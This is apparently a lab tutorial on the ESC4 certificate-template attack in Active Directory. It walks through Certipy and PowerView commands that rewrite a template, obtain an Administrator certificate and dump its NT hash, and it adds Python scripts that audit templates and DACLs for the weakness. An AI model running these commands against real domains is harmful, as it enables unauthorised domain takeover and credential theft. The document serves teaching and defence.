ESC4
Understanding ESC4 - Vulnerable Certificate Template Access Control
Access control attacks exploit misconfigurations in the Certificate Authority or certificate templates' discretionary access control lists (DACLs), which allow low-privileged users to perform sensitive tasks on the CA or the objects that compose it.
When we have elevated privileges over an object in Active Directory, we can perform different actions that allow us to escalate privileges. For example, if we have Full Control over a user account we can reset the user's password or change specific properties to perform other attacks, allowing us to gain control over the user.
Certificate templates function as securable entities within Active Directory, possessing a security descriptor that dictates the specific permissions granted to various AD principals over the template.
A template is deemed misconfigured at the access control level when it contains Access Control Entries (ACEs) that inadvertently grant editing permissions to unintended or otherwise unprivileged AD principals, potentially allowing them to modify sensitive security settings within the template. If we have the appropriate rights over a template, we can make it vulnerable to attacks such as ESC1.
ESC4 Abuse Requirements
To execute an ESC4 attack, we need powerful rights over a certificate template. By manipulating the template object, we can introduce a misconfiguration into a template that is not otherwise vulnerable. One example is enabling the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag on a template that allows domain authentication. This results in the same domain compromise scenario as ESC1, where low-privileged users can specify an arbitrary Subject Alternative Name and authenticate as someone else.
To make a template vulnerable, the following attributes need to be modified with the specified values:
- Grant Enrollment rights for the vulnerable template.
- Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval.
- Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement.
- Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN.
- Set the mspki-certificate-application-policy to a certificate purpose for authentication:
  - Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
  - Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
  - PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
  - Any Purpose (OID: 2.5.29.37.0)
  - No Extended Key Usage (EKU)
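The five conditions above are also the ones an auditor checks for when deciding whether a template that someone could edit has already been turned into an ESC1-style template. The following is an added example, not Certipy, Certify or PowerView code: it takes a template's raw attribute values, as read from LDAP, and reports which of the conditions are met. The bit values for PEND_ALL_REQUESTS (0x2), INCLUDE_SYMMETRIC_ALGORITHMS (0x1), PUBLISH_TO_DS (0x8) and ENROLLEE_SUPPLIES_SUBJECT (0x1) are the ones this page cites from Microsoft's attribute documentation; AUTO_ENROLLMENT (0x20) and the SUBJECT_*_REQUIRE_* bits used in the sample data are taken from the same documentation. The two sample templates are my reconstruction of the ESC4 template before and after modification as shown in the tool output later on this page, not copied output.

```python
# Added example (not Certipy/Certify/PowerView code): decide whether a
# certificate template meets the five ESC1 conditions listed above.

# msPKI-Enrollment-Flag bits (0x1, 0x2, 0x8 as cited on this page; 0x20 from the Microsoft docs)
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
CT_FLAG_PUBLISH_TO_DS = 0x00000008
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# msPKI-Certificate-Name-Flag bits (0x1 as cited on this page; the rest from the Microsoft docs)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL = 0x04000000
CT_FLAG_SUBJECT_REQUIRE_EMAIL = 0x20000000
CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH = 0x80000000

# Purposes from the list above that make an issued certificate usable for logon
AUTH_OIDS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}

# Groups that effectively every domain account belongs to
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def u32(value):
    """LDAP hands these flag attributes back as signed 32-bit integers; when the
    top bit (SUBJECT_REQUIRE_DIRECTORY_PATH) is set the value reads negative."""
    return value & 0xFFFFFFFF


def authentication_purpose(oids):
    """Return the purpose name that permits logon, the 'No EKU' case for an
    empty list, or None when the template is limited to non-logon uses."""
    if not oids:
        return "No Extended Key Usage"
    for oid in oids:
        if oid in AUTH_OIDS:
            return AUTH_OIDS[oid]
    return None


def assess_template(tpl):
    """Return one string per ESC1 condition the template satisfies."""
    met = []
    if LOW_PRIV_PRINCIPALS & set(tpl["enrollment_rights"]):
        met.append("low-privileged principals hold Enroll")
    if not u32(tpl["mspki-enrollment-flag"]) & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("manager approval not required (PEND_ALL_REQUESTS clear)")
    if tpl["mspki-ra-signature"] == 0:
        met.append("no authorized signature required")
    if u32(tpl["mspki-certificate-name-flag"]) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject (requester chooses the SAN)")
    purpose = authentication_purpose(tpl["mspki-certificate-application-policy"])
    if purpose:
        met.append(f"usable for authentication ({purpose})")
    return met


def is_esc1_exposed(tpl):
    """ESC1 needs all five conditions at once."""
    return len(assess_template(tpl)) == 5


# Constructed sample data (my reconstruction of the ESC4 template shown later on this page)
ESC4_BEFORE = {
    "enrollment_rights": ["Domain Admins", "Domain Users", "Enterprise Admins"],
    "mspki-enrollment-flag": CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS | CT_FLAG_AUTO_ENROLLMENT,
    "mspki-ra-signature": 0,
    # UPN/email/directory-path requirement bits, i.e. 0xA6000000 stored as a signed 32-bit integer
    "mspki-certificate-name-flag": -1509949440,
    # Encrypting File System and Secure Email
    "mspki-certificate-application-policy": ["1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"],
}
ESC4_AFTER = {
    "enrollment_rights": ["Authenticated Users"],
    "mspki-enrollment-flag": CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
    "mspki-ra-signature": 0,
    "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "mspki-certificate-application-policy": ["1.3.6.1.5.5.7.3.2"],
}

if __name__ == "__main__":
    for name, tpl in (("before", ESC4_BEFORE), ("after", ESC4_AFTER)):
        print(f"ESC4 template {name}: exposed={is_esc1_exposed(tpl)}")
        for line in assess_template(tpl):
            print("   -", line)
```

Note that the unmodified template already meets three of the five conditions (low-privileged Enroll, no manager approval, no authorized signature), which is why a single write to the name flag plus an authentication EKU is all that separates it from ESC1. The signed-integer normalisation matters in practice: a template whose name flag has the directory-path bit set shows up in LDAP with a negative value, and a check that tests the raw value against 0x1 still works, but comparisons against documented 32-bit constants do not unless the value is masked first.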
ESC4 Enumeration and Attack
We will discuss how to enumerate and abuse ESC4 from Linux and Windows.
ESC4 Enumeration from Linux
Let's use certipy to find vulnerable templates and focus on the template named ESC4:
Certipy vulnerable certificate template enumeration
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
2
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectRequireEmail
SubjectAltRequireEmail
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Black Wasp
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
Write Property Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
LAB.LOCAL\Black Wasp
[!] Vulnerabilities
ESC4 : 'LAB.LOCAL\\Black Wasp' has dangerous permissions
In the above output, we can see in the Object Control Permissions field that the user Black Wasp has Full Control on this template.
ESC4 Attack from Linux
To simplify the process, Certipy can configure all required settings in one command if we have sufficient rights over the template. We use the template argument together with the option -template <VULNERABLE TEMPLATE>, giving the name of the vulnerable template, in our case ESC4. Additionally, we can specify the option -save-old so that we can restore the template configuration once we are done with the attack:
Attacking ESC4 vulnerable template
$ certipy template -u 'BlWasp@lab.local' -p 'Password123!' -template ESC4 -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'ESC4' to 'ESC4.json'
[*] Updating certificate template 'ESC4'
[*] Successfully updated 'ESC4'
The -save-old option saves the old configuration to a file named TEMPLATE-NAME.json, in this case ESC4.json. This matters later, when we want to restore the template to its original configuration.
Now, let's see the new template configuration:
ESC4 Template after modification
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
2
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16777216
65536
ExportableKey
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 5 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Authenticated Users
Write Owner Principals : LAB.LOCAL\Authenticated Users
Write Dacl Principals : LAB.LOCAL\Authenticated Users
Write Property Principals : LAB.LOCAL\Authenticated Users
[!] Vulnerabilities
ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions
It is possible to exploit the template with the ESC1 vulnerability and authenticate with the alternate subject.
Abusing the modified template
$ certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC4 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 61
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Now we can retrieve the Administrator NT Hash or use the certificate to authenticate:
Retrieve Administrator NT Hash
$ certipy auth -pfx administrator.pfx -username Administrator -domain lab.local
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
Finally, we can revert the changes to the original state. We need to select the template name with the option -template ESC4 and the configuration we saved with the option -configuration ESC4.json:
Restore template configuration
$ certipy template -u 'BlWasp@lab.local' -p 'Password123!' -template ESC4 -configuration ESC4.json
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'ESC4'
[*] Successfully updated 'ESC4'
ESC4 Enumeration from Windows
Let's connect to the target computer using the blwasp credentials:
Connect via RDP
$ xfreerdp /u:blwasp /p:'Password123!' /d:lab.local /v:10.129.228.236 /dynamic-resolution
[19:18:25:549] [948409:948410] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:18:25:549] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
<SNIP>
When enumerating an ADCS server for the ESC4 domain escalation scenario, we need to pay attention to our user's privileges in the Object Control Permissions section, because Certify does not mark a template as vulnerable just because we hold elevated privileges over it; we have to identify that manually. We can use the Certify.exe find command to display all certificate templates.
Certify templates enumeration
PS C:\Tools> .\Certify.exe find
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Listing info about the Enterprise CA 'lab-LAB-DC-CA'
Enterprise CA Name : lab-LAB-DC-CA
DNS Hostname : LAB-DC.lab.local
FullName : LAB-DC.lab.local\lab-LAB-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=lab-LAB-DC-CA, DC=lab, DC=local
Cert Thumbprint : CF54249CAEFB0E092265BFD306940DCBABA4C9A6
Cert Serial : 16BD1CE8853DB8B5488A16757CA7C101
Cert Start Date : 26/03/2022 01:07:46
Cert End Date : 26/03/2027 01:17:46
Cert Chain : CN=lab-LAB-DC-CA,DC=lab,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
Allow ManageCA, ManageCertificates LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Allow ManageCA, Enroll LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Allow ManageCA, Enroll LAB\user_manageCA S-1-5-21-2570265163-3918697770-3667495639-1194
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
<SNIP>
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC4
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System, Secure Email
mspki-certificate-application-policy : Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
All Extended Rights : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Full Control Principals : LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
In the output above, we can see the ESC4 template. In the Object Control Permissions section, the user blwasp has Full Control over this template, meaning we can execute the ESC4 attack against this template. The following GitHub repository contains information about Abusing Weak ACL on Certificate Templates.
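The manual check described above can be done programmatically over the template's security descriptor. The following is an added example, not Certify or Certipy code: given a template object's owner and DACL, it lists the principals outside the expected administrative set that hold object-control rights (Full Control, WriteDacl, WriteOwner, or an unscoped WriteProperty) or own the object, since any of those is enough to rewrite the template. The access-mask bit values are the ADS_RIGHT_* constants from the Windows SDK, the Certificate-Enrollment rights GUID is the one used in the PowerView command in the Windows attack section, and the ACE records are constructed from the Certify output above rather than parsed from a live security descriptor. The expected-controller set is an assumption for this lab; in a real assessment it comes from the organisation's PKI administration model.

```python
# Added example (not Certify/Certipy code): find principals with object-control
# rights over a certificate template object, which Certify's /vulnerable output
# does not flag on its own.

# Access-mask bits (ADS_RIGHT_* constants from the Windows SDK)
ADS_RIGHT_DS_WRITE_PROP = 0x00000020
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # extended rights such as Certificate-Enrollment
ADS_RIGHT_WRITE_DAC = 0x00040000
ADS_RIGHT_WRITE_OWNER = 0x00080000
ADS_RIGHT_GENERIC_ALL = 0x10000000

# Rights GUID of the Certificate-Enrollment extended right (from the PowerView command on this page)
CERTIFICATE_ENROLLMENT_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"

# Assumption for this lab: principals allowed to control templates; anything else is a finding
EXPECTED_CONTROLLERS = {
    "BUILTIN\\Administrators",
    "LAB\\Administrator",
    "LAB\\Domain Admins",
    "LAB\\Enterprise Admins",
}


def control_rights(ace):
    """Names of the object-control rights one Allow ACE grants."""
    mask = ace["mask"]
    if mask & ADS_RIGHT_GENERIC_ALL:
        return ["FullControl"]           # implies every other right
    rights = []
    if mask & ADS_RIGHT_WRITE_DAC:
        rights.append("WriteDacl")
    if mask & ADS_RIGHT_WRITE_OWNER:
        rights.append("WriteOwner")
    # WriteProperty scoped to a single attribute GUID cannot rewrite the whole
    # template; only an unscoped WriteProperty (object_type None) counts here.
    if mask & ADS_RIGHT_DS_WRITE_PROP and ace["object_type"] is None:
        rights.append("WriteProperty")
    return rights


def grants_enroll(ace):
    """True if the ACE grants Certificate-Enrollment directly, through
    All Extended Rights (no GUID), or through Full Control."""
    mask = ace["mask"]
    if mask & ADS_RIGHT_GENERIC_ALL:
        return True
    return bool(mask & ADS_RIGHT_DS_CONTROL_ACCESS) and ace["object_type"] in (None, CERTIFICATE_ENROLLMENT_GUID)


def audit_template_dacl(owner, aces, expected=EXPECTED_CONTROLLERS):
    """Map each unexpected principal to the control rights it holds.
    Deny ACEs are skipped instead of being evaluated in order; that is enough
    for a first pass on template objects, where deny ACEs are rare."""
    findings = {}
    if owner not in expected:
        findings.setdefault(owner, []).append("Owner")
    for ace in aces:
        if ace["type"] != "Allow" or ace["principal"] in expected:
            continue
        rights = control_rights(ace)
        if rights:
            findings.setdefault(ace["principal"], []).extend(rights)
    return findings


def enrollment_principals(aces):
    """Sorted list of principals that can enroll in the template."""
    return sorted({ace["principal"] for ace in aces if ace["type"] == "Allow" and grants_enroll(ace)})


def _ace(principal, mask, object_type=None):
    return {"type": "Allow", "principal": principal, "mask": mask, "object_type": object_type}


ADMIN_CONTROL = ADS_RIGHT_WRITE_DAC | ADS_RIGHT_WRITE_OWNER | ADS_RIGHT_DS_WRITE_PROP

# Constructed from the ESC4 template's Certify output above
ESC4_OWNER = "LAB\\Administrator"
ESC4_ACES = [
    _ace("LAB\\Domain Admins", ADS_RIGHT_DS_CONTROL_ACCESS, CERTIFICATE_ENROLLMENT_GUID),
    _ace("LAB\\Domain Users", ADS_RIGHT_DS_CONTROL_ACCESS, CERTIFICATE_ENROLLMENT_GUID),
    _ace("LAB\\Enterprise Admins", ADS_RIGHT_DS_CONTROL_ACCESS, CERTIFICATE_ENROLLMENT_GUID),
    _ace("LAB\\blwasp", ADS_RIGHT_DS_CONTROL_ACCESS),   # All Extended Rights
    _ace("LAB\\blwasp", ADS_RIGHT_GENERIC_ALL),          # Full Control
    _ace("LAB\\Administrator", ADMIN_CONTROL),
    _ace("LAB\\Domain Admins", ADMIN_CONTROL),
    _ace("LAB\\Enterprise Admins", ADMIN_CONTROL),
]

if __name__ == "__main__":
    print("can enroll:", enrollment_principals(ESC4_ACES))
    print("unexpected control:", audit_template_dacl(ESC4_OWNER, ESC4_ACES))
```

Run against the constructed DACL, the audit reports only blwasp, with Full Control; Domain Users appear among the enrollers but are not a control finding, because Enroll alone does not let a principal edit the template. Ownership is reported separately since an owner can always rewrite the DACL, which is why the Certipy output on this page lists Owner next to the Write Owner and Write Dacl principals.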
ESC4 Attack from Windows
Depending on the existing privileges in the certificate template, we would need to modify one or several components of it. In this case, we will show all the necessary changes to leave the template vulnerable to ESC1. We will use PowerView to perform the attack:
Import-Module PowerView
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\PowerView.ps1
The first thing we will do is to add Certificate-Enrollment rights to the Domain Users group:
Add Certificate-Enrollment rights
PS C:\Tools> Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/DC=LAB,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Users)(name=Domain Users)(displayname=Domain Users))))
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local rights GUID '0e10c968-78fb-11d2-90d4-00c04f79dc55' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public
Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Error granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=12221497.FDC67FA30189A813651BA8B3E433ACA5,CN=OID,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local 'All' on CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=Domain Users,CN=Users,DC=lab,DC=local rights GUID '0e10c968-78fb-11d2-90d4-00c04f79dc55' on CN=ESC4,CN=Certificate Templates,CN=Public Key
Services,CN=Services,CN=Configuration,DC=lab,DC=local
Next, we need to disable the manager approval requirement. According to Microsoft - msPKI-Enrollment-Flag Attribute, the PEND_ALL_REQUESTS flag bit is 0x00000002, so that bit must not be set. Instead we keep 0x00000001, which corresponds to CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS, and 0x00000008, which is CT_FLAG_PUBLISH_TO_DS. To set both, we use 0x00000009, or 9:
Disabling Manager Approval Requirement
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-enrollment-flag' to '9' for object ''
Now we need to disable the Authorized Signature requirement. We set the mspki-ra-signature attribute to 0:
Disabling Authorized Signature Requirement
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-ra-signature' to '0' for object ''
To make this template vulnerable to ESC1, we need to allow requesters to specify a subjectAltName in the CSR. This setting is controlled by flag bits in the mspki-certificate-name-flag attribute. The Microsoft documentation for the msPKI-Certificate-Name-Flag Attribute defines the ENROLLEE_SUPPLIES_SUBJECT flag bit as 0x00000001. To enable it, we set this attribute to 1:
Enabling SAN Specification
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] XORing 'mspki-certificate-name-flag' with '1' for object ''
The final part is to allow certificates from this template to be used for Client Authentication. We set the PKI Extended Key Usage and the mspki-certificate-application-policy to the OID 1.3.6.1.5.5.7.3.2:
Setting PKI Extended Key Usage
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'pkiextendedkeyusage' to '1.3.6.1.5.5.7.3.2' for object ''
Setting mspki-certificate-application-policy
PS C:\Tools> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=ESC4)(name=ESC4)(displayname=ESC4))))
VERBOSE: [Set-DomainObject] Setting 'mspki-certificate-application-policy' to '1.3.6.1.5.5.7.3.2' for object ''
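Each of the Set-DomainObject steps above changes one attribute, and every one of them is visible to a defender who compares the template against a saved baseline, whether that baseline is the file -save-old wrote or a periodic export of the Certificate Templates container. The following is an added example, not Certipy, Certify or PowerView code: it diffs a baseline snapshot against the template's current state, separates the changes that move the template toward ESC1 from harmless ones, and names the step each risky change corresponds to. The snapshot layout is my own, not the format of Certipy's ESC4.json; both snapshots are constructed from the Certify output before and after the PowerView changes. Flag bit values are as cited on this page from the Microsoft documentation, with AUTO_ENROLLMENT (0x20) taken from the same documentation.

```python
# Added example (not Certipy/Certify/PowerView code): classify template drift
# between a saved baseline and the current state.

CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag, as cited on this page
CT_FLAG_AUTO_ENROLLMENT = 0x00000020            # msPKI-Enrollment-Flag, from the Microsoft docs
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag, as cited on this page

# OIDs that make a certificate usable for logon (the list in the requirements section)
AUTH_OIDS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.2.3.4", "2.5.29.37.0"}
EKU_ATTRS = ("pkiextendedkeyusage", "mspki-certificate-application-policy")


def u32(value):
    """Normalise the signed 32-bit integers LDAP returns for flag attributes."""
    return value & 0xFFFFFFFF


def _norm(value):
    if isinstance(value, list):
        return tuple(sorted(value))
    if isinstance(value, int):
        return u32(value)
    return value


def changed_attributes(baseline, current):
    """Every attribute whose value differs, risky or not."""
    return sorted(k for k in baseline if _norm(baseline[k]) != _norm(current[k]))


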